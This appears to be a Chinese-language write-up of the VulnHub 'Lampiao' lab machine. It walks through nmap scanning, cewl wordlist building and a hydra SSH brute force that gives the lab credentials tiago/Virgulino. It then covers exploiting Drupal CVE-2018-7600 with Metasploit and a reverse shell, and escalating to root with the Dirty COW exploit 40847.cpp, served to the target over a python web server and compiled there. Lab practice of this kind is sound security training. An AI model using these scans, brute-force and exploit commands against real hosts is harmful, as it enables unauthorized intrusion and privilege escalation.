使用nmap 获取目标IP访问后
nmap -sP 192.168.188.0/24
扫描服务 nmap -sS -sV -T5 -A -p- 192.168.188.128
尝试访问80端口
目录爆破没有 查看1898 端口
两个二级页面
根据url 规则,可能存在 2页面
尝试访问文件
音频 提示 user tiago
二维码解析内容 try harder 尝试进行目录爆破
发现robots文件,尝试访问
CHANGELOG.txt 发现版本信息
网站基于drupal7 搭建
cewl http://192.168.188.128:1898/?q=node/1 -w dayu.txt
使用cewl 基于页面信息生产密码字典
hydra 爆破
hydra -l tiago -P dayu.txt 192.168.188.128 ssh
得到用户密码
login: tiago password: Virgulino
ssh登录成功,不能使用sudo su 提权
二、提权
根据已知的信息提取
cve-2018-7600使用msf进行渗透
查询durpal msf存在的漏洞,使用2018年的漏洞,填写配置信息
成功进入系统,获得低权限用户,反弹shell 获取root权限
使用 dirty(脏牛)提权
使用 searchsploit dirty 查找脏牛提权shell 利用40847.cpp
复制
cp /usr/share/exploitdb/exploits/linux/local/40847.cpp ~
搭建本地服务器 把40847发送到靶机上。
python2 -m SimpleHTTPServer 5555 开启服务
命令
g++ -Wall -pedantic -O2 -std=c++11 -pthread -o 40847 40847.cpp -lutil
提权成功 获取root密码
远程root登录成功
原文始发于微信公众号(北京路劲科技有限公司):vulnhub - Lampiao靶场实战
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论